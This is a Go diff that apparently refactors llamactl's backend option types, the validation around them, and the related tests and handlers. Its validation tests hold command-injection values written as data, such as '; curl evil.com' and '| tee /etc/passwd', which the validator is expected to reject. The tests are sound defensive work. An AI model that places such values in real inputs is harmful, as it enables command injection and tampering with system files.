return nil, err
|
||||
}
|
||||
@@ -232,7 +231,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.Options
|
||||
return nil, fmt.Errorf("instance options cannot be nil")
|
||||
}
|
||||
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
err := options.BackendOptions.ValidateInstanceOptions()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -493,39 +492,12 @@ func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, e

// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.Options) int {
-	switch options.BackendType {
-	case backends.BackendTypeLlamaCpp:
-		if options.LlamaServerOptions != nil {
-			return options.LlamaServerOptions.Port
-		}
-	case backends.BackendTypeMlxLm:
-		if options.MlxServerOptions != nil {
-			return options.MlxServerOptions.Port
-		}
-	case backends.BackendTypeVllm:
-		if options.VllmServerOptions != nil {
-			return options.VllmServerOptions.Port
-		}
-	}
-	return 0
+	return options.BackendOptions.GetPort()
}

// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.Options, port int) {
-	switch options.BackendType {
-	case backends.BackendTypeLlamaCpp:
-		if options.LlamaServerOptions != nil {
-			options.LlamaServerOptions.Port = port
-		}
-	case backends.BackendTypeMlxLm:
-		if options.MlxServerOptions != nil {
-			options.MlxServerOptions.Port = port
-		}
-	case backends.BackendTypeVllm:
-		if options.VllmServerOptions != nil {
-			options.VllmServerOptions.Port = port
-		}
-	}
+	options.BackendOptions.SetPort(port)
}

// assignAndValidatePort assigns a port if not specified and validates it's not in use
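With the switch statements gone, per-backend dispatch is now the job of backends.Options. A minimal sketch of how GetPort and SetPort could delegate (illustrative only, not the repository's exact code; getBackend stands in for an assumed internal accessor that returns whichever typed backend options field is populated):

	// Sketch: possible delegation inside the backends package.
	func (o *Options) GetPort() int {
		if b := o.getBackend(); b != nil { // getBackend: assumed internal helper
			return b.GetPort()
		}
		return 0
	}

	func (o *Options) SetPort(port int) {
		if b := o.getBackend(); b != nil {
			b.SetPort(port)
		}
	}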
@@ -2,7 +2,6 @@ package manager_test

import (
	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
	"llamactl/pkg/config"
	"llamactl/pkg/instance"
	"llamactl/pkg/manager"
@@ -14,10 +13,12 @@ func TestCreateInstance_Success(t *testing.T) {
	manager := createTestManager()

	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  8080,
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+				Port:  8080,
+			},
		},
	}
@@ -41,9 +42,11 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
	// Test duplicate names
	mngr := createTestManager()
	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+			},
		},
	}
@@ -97,9 +100,11 @@ func TestPortManagement(t *testing.T) {

	// Test auto port assignment
	options1 := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+			},
		},
	}
@@ -115,10 +120,12 @@ func TestPortManagement(t *testing.T) {

	// Test port conflict detection
	options2 := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model2.gguf",
-			Port:  port1, // Same port - should conflict
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model2.gguf",
+				Port:  port1, // Same port - should conflict
+			},
		},
	}
@@ -133,10 +140,12 @@ func TestPortManagement(t *testing.T) {
	// Test port release on deletion
	specificPort := 8080
	options3 := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  specificPort,
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+				Port:  specificPort,
+			},
		},
	}
@@ -161,9 +170,11 @@ func TestInstanceOperations(t *testing.T) {
	manager := createTestManager()

	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+			},
		},
	}
@@ -184,10 +195,12 @@ func TestInstanceOperations(t *testing.T) {

	// Update instance
	newOptions := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/new-model.gguf",
-			Port:  8081,
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/new-model.gguf",
+				Port:  8081,
+			},
		},
	}
@@ -195,8 +208,8 @@ func TestInstanceOperations(t *testing.T) {
	if err != nil {
		t.Fatalf("UpdateInstance failed: %v", err)
	}
-	if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
-		t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
+	if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
+		t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().BackendOptions.LlamaServerOptions.Model)
	}

	// List instances
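Read paths shift the same way as construction: code that used to reach backend fields directly on the instance options now goes through the nested struct, for example:

	// before: updated.GetOptions().LlamaServerOptions.Model
	// after:
	model := updated.GetOptions().BackendOptions.LlamaServerOptions.Model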
@@ -2,7 +2,6 @@ package manager_test

import (
	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
	"llamactl/pkg/config"
	"llamactl/pkg/instance"
	"llamactl/pkg/manager"
@@ -36,9 +35,11 @@ func TestTimeoutFunctionality(t *testing.T) {
	idleTimeout := 1 // 1 minute
	options := &instance.Options{
		IdleTimeout: &idleTimeout,
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+			},
		},
	}
@@ -85,9 +86,11 @@ func TestTimeoutFunctionality(t *testing.T) {

	// Test that instance without timeout doesn't timeout
	noTimeoutOptions := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+			},
		},
		// No IdleTimeout set
	}
@@ -116,25 +119,31 @@ func TestEvictLRUInstance_Success(t *testing.T) {

	// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
	options1 := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model1.gguf",
-		},
		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model1.gguf",
+			},
+		},
	}
	options2 := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model2.gguf",
-		},
		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model2.gguf",
+			},
+		},
	}
	options3 := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model3.gguf",
-		},
		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model3.gguf",
+			},
+		},
	}

	inst1, err := manager.CreateInstance("instance-1", options1)
@@ -198,11 +207,13 @@ func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
	// Helper function to create instances with different timeout configurations
	createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
		options := &instance.Options{
-			BackendType: backends.BackendTypeLlamaCpp,
-			LlamaServerOptions: &llamacpp.LlamaServerOptions{
-				Model: model,
-			},
			IdleTimeout: timeout,
+			BackendOptions: backends.Options{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &backends.LlamaServerOptions{
+					Model: model,
+				},
+			},
		}
		inst, err := manager.CreateInstance(name, options)
		if err != nil {
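Aside: the inline func() *int { timeout := 1; return &timeout }() literals above exist only to take the address of a small constant; with the testutil helpers touched later in this change, the same option could be written more directly (illustrative sketch):

	options1 := &instance.Options{
		IdleTimeout: testutil.IntPtr(1), // any value > 0 keeps the instance eligible for LRU eviction
		BackendOptions: backends.Options{
			BackendType: backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &backends.LlamaServerOptions{
				Model: "/path/to/model1.gguf",
			},
		},
	}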
@@ -4,9 +4,6 @@ import (
	"encoding/json"
	"fmt"
	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
-	"llamactl/pkg/backends/mlx"
-	"llamactl/pkg/backends/vllm"
	"llamactl/pkg/instance"
	"net/http"
	"os/exec"
@@ -43,7 +40,7 @@ func (h *Handler) LlamaCppProxy(onDemandStart bool) http.HandlerFunc {
		return
	}

-	if options.BackendType != backends.BackendTypeLlamaCpp {
+	if options.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
		http.Error(w, "Instance is not a llama.cpp server.", http.StatusBadRequest)
		return
	}
@@ -130,14 +127,16 @@ func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
		writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
		return
	}
-	llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
+	llamaOptions, err := backends.ParseLlamaCommand(req.Command)
	if err != nil {
		writeError(w, http.StatusBadRequest, "parse_error", err.Error())
		return
	}
	options := &instance.Options{
-		BackendType:        backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: llamaOptions,
+		BackendOptions: backends.Options{
+			BackendType:        backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: llamaOptions,
+		},
	}
	w.Header().Set("Content-Type", "application/json")
	if err := json.NewEncoder(w).Encode(options); err != nil {
@@ -179,7 +178,7 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc {
		return
	}

-	mlxOptions, err := mlx.ParseMlxCommand(req.Command)
+	mlxOptions, err := backends.ParseMlxCommand(req.Command)
	if err != nil {
		writeError(w, http.StatusBadRequest, "parse_error", err.Error())
		return
@@ -189,8 +188,10 @@
	backendType := backends.BackendTypeMlxLm

	options := &instance.Options{
-		BackendType:      backendType,
-		MlxServerOptions: mlxOptions,
+		BackendOptions: backends.Options{
+			BackendType:      backendType,
+			MlxServerOptions: mlxOptions,
+		},
	}

	w.Header().Set("Content-Type", "application/json")
@@ -233,7 +234,7 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc {
		return
	}

-	vllmOptions, err := vllm.ParseVllmCommand(req.Command)
+	vllmOptions, err := backends.ParseVllmCommand(req.Command)
	if err != nil {
		writeError(w, http.StatusBadRequest, "parse_error", err.Error())
		return
@@ -242,8 +243,10 @@
	backendType := backends.BackendTypeVllm

	options := &instance.Options{
-		BackendType:       backendType,
-		VllmServerOptions: vllmOptions,
+		BackendOptions: backends.Options{
+			BackendType:       backendType,
+			VllmServerOptions: vllmOptions,
+		},
	}

	w.Header().Set("Content-Type", "application/json")
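All three parse handlers now share one shape: parse the command with the backends package, then wrap the result in a nested backends.Options. A hedged sketch of that wrap step for the llama.cpp case (the helper name is invented for illustration; the MLX and vLLM handlers differ only in the type constant and the options field they set):

	// Hypothetical helper showing the common wrap step.
	func wrapLlamaOptions(llamaOptions *backends.LlamaServerOptions) *instance.Options {
		return &instance.Options{
			BackendOptions: backends.Options{
				BackendType:        backends.BackendTypeLlamaCpp,
				LlamaServerOptions: llamaOptions,
			},
		}
	}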
@@ -1,5 +1,7 @@
package testutil

+import "slices"
+
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
	return &b
@@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool {
func IntPtr(i int) *int {
	return &i
}
+
+// Helper functions for testing command arguments
+
+// Contains checks if a slice contains a specific item
+func Contains(slice []string, item string) bool {
+	return slices.Contains(slice, item)
+}
+
+// ContainsFlagWithValue checks if args contains a flag followed by a specific value
+func ContainsFlagWithValue(args []string, flag, value string) bool {
+	for i, arg := range args {
+		if arg == flag {
+			// Check if there's a next argument and it matches the expected value
+			if i+1 < len(args) && args[i+1] == value {
+				return true
+			}
+		}
+	}
+	return false
+}
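These helpers are meant for asserting on generated command-line arguments. A possible use in a test (illustrative; the argument slice is made up):

	args := []string{"llama-server", "--model", "/path/to/model.gguf", "--port", "8080"}

	if !testutil.Contains(args, "--model") {
		t.Error("expected --model flag in args")
	}
	if !testutil.ContainsFlagWithValue(args, "--port", "8080") {
		t.Error("expected --port 8080 in args")
	}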
@@ -2,8 +2,6 @@ package validation

import (
	"fmt"
-	"llamactl/pkg/backends"
-	"llamactl/pkg/instance"
	"reflect"
	"regexp"
)
@@ -24,8 +22,8 @@

type ValidationError error

-// validateStringForInjection checks if a string contains dangerous patterns
-func validateStringForInjection(value string) error {
+// ValidateStringForInjection checks if a string contains dangerous patterns
+func ValidateStringForInjection(value string) error {
	for _, pattern := range dangerousPatterns {
		if pattern.MatchString(value) {
			return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
@@ -34,83 +32,8 @@ func validateStringForInjection(value string) error {
	return nil
}

-// ValidateInstanceOptions performs validation based on backend type
-func ValidateInstanceOptions(options *instance.Options) error {
-	if options == nil {
-		return ValidationError(fmt.Errorf("options cannot be nil"))
-	}
-
-	// Validate based on backend type
-	switch options.BackendType {
-	case backends.BackendTypeLlamaCpp:
-		return validateLlamaCppOptions(options)
-	case backends.BackendTypeMlxLm:
-		return validateMlxOptions(options)
-	case backends.BackendTypeVllm:
-		return validateVllmOptions(options)
-	default:
-		return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
-	}
-}
-
-// validateLlamaCppOptions validates llama.cpp specific options
-func validateLlamaCppOptions(options *instance.Options) error {
-	if options.LlamaServerOptions == nil {
-		return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
-	}
-
-	// Use reflection to check all string fields for injection patterns
-	if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
-		return err
-	}
-
-	// Basic network validation for port
-	if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
-		return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
-	}
-
-	return nil
-}
-
-// validateMlxOptions validates MLX backend specific options
-func validateMlxOptions(options *instance.Options) error {
-	if options.MlxServerOptions == nil {
-		return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
-	}
-
-	if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
-		return err
-	}
-
-	// Basic network validation for port
-	if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
-		return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
-	}
-
-	return nil
-}
-
-// validateVllmOptions validates vLLM backend specific options
-func validateVllmOptions(options *instance.Options) error {
-	if options.VllmServerOptions == nil {
-		return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
-	}
-
-	// Use reflection to check all string fields for injection patterns
-	if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
-		return err
-	}
-
-	// Basic network validation for port
-	if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
-		return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
-	}
-
-	return nil
-}
-
-// validateStructStrings recursively validates all string fields in a struct
-func validateStructStrings(v any, fieldPath string) error {
+// ValidateStructStrings recursively validates all string fields in a struct
+func ValidateStructStrings(v any, fieldPath string) error {
	val := reflect.ValueOf(v)
	if val.Kind() == reflect.Ptr {
		val = val.Elem()
@@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error {

	switch field.Kind() {
	case reflect.String:
-		if err := validateStringForInjection(field.String()); err != nil {
+		if err := ValidateStringForInjection(field.String()); err != nil {
			return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
		}

	case reflect.Slice:
		if field.Type().Elem().Kind() == reflect.String {
			for j := 0; j < field.Len(); j++ {
-				if err := validateStringForInjection(field.Index(j).String()); err != nil {
+				if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
					return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
				}
			}
		}

	case reflect.Struct:
-		if err := validateStructStrings(field.Interface(), fieldName); err != nil {
+		if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
			return err
		}
	}
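The backend-specific validators removed here presumably move behind backends.Options.ValidateInstanceOptions, which the manager and the tests now call; the injection and struct-walking helpers are exported so that method can reuse them. A rough sketch under that assumption (getBackend is a hypothetical accessor for the populated typed options):

	// Sketch only: consolidated validation on backends.Options.
	func (o *Options) ValidateInstanceOptions() error {
		b := o.getBackend() // hypothetical: returns the typed options for o.BackendType
		if b == nil {
			return fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType)
		}
		// Reuse the exported helpers for injection checks on all string fields.
		if err := validation.ValidateStructStrings(b, ""); err != nil {
			return err
		}
		// Basic network validation for the port.
		if port := o.GetPort(); port < 0 || port > 65535 {
			return fmt.Errorf("invalid port range: %d", port)
		}
		return nil
	}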
@@ -2,9 +2,6 @@ package validation_test

import (
	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
-	"llamactl/pkg/instance"
-	"llamactl/pkg/testutil"
	"llamactl/pkg/validation"
	"strings"
	"testing"
@@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) {
}

func TestValidateInstanceOptions_NilOptions(t *testing.T) {
-	err := validation.ValidateInstanceOptions(nil)
+	var opts backends.Options
+	err := opts.ValidateInstanceOptions()
	if err == nil {
		t.Error("Expected error for nil options")
	}
-	if !strings.Contains(err.Error(), "options cannot be nil") {
-		t.Errorf("Expected 'options cannot be nil' error, got: %v", err)
-	}
}

func TestValidateInstanceOptions_PortValidation(t *testing.T) {
@@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
-			options := &instance.Options{
+			options := backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
					Port: tt.port,
				},
			}

-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
			if (err != nil) != tt.wantErr {
				t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
			}
@@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// Test with Model field (string field)
-			options := &instance.Options{
+			options := backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
					Model: tt.value,
				},
			}

-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
			if (err != nil) != tt.wantErr {
				t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
			}
@@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// Test with Lora field (array field)
-			options := &instance.Options{
+			options := backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
					Lora: tt.array,
				},
			}

-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
			if (err != nil) != tt.wantErr {
				t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
			}
@@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
	// Test that injection in any field is caught
	tests := []struct {
		name    string
-		options *instance.Options
+		options backends.Options
		wantErr bool
	}{
		{
			name: "injection in model field",
-			options: &instance.Options{
+			options: backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
					Model:  "safe.gguf",
					HFRepo: "microsoft/model; curl evil.com",
				},
@@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
		},
		{
			name: "injection in log file",
-			options: &instance.Options{
+			options: backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
					Model:   "safe.gguf",
					LogFile: "/tmp/log.txt | tee /etc/passwd",
				},
@@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
		},
		{
			name: "all safe fields",
-			options: &instance.Options{
+			options: backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
					Model:   "/path/to/model.gguf",
					HFRepo:  "microsoft/DialoGPT-medium",
					LogFile: "/tmp/llama.log",
@@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
-			err := validation.ValidateInstanceOptions(tt.options)
+			err := tt.options.ValidateInstanceOptions()
			if (err != nil) != tt.wantErr {
				t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
			}
@@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {

func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
	// Test that non-string fields don't interfere with validation
-	options := &instance.Options{
-		AutoRestart:  testutil.BoolPtr(true),
-		MaxRestarts:  testutil.IntPtr(5),
-		RestartDelay: testutil.IntPtr(10),
-		BackendType:  backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+	options := backends.Options{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &backends.LlamaServerOptions{
			Port:      8080,
			GPULayers: 32,
			CtxSize:   4096,
@@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
		},
	}

-	err := validation.ValidateInstanceOptions(options)
+	err := options.ValidateInstanceOptions()
	if err != nil {
		t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
	}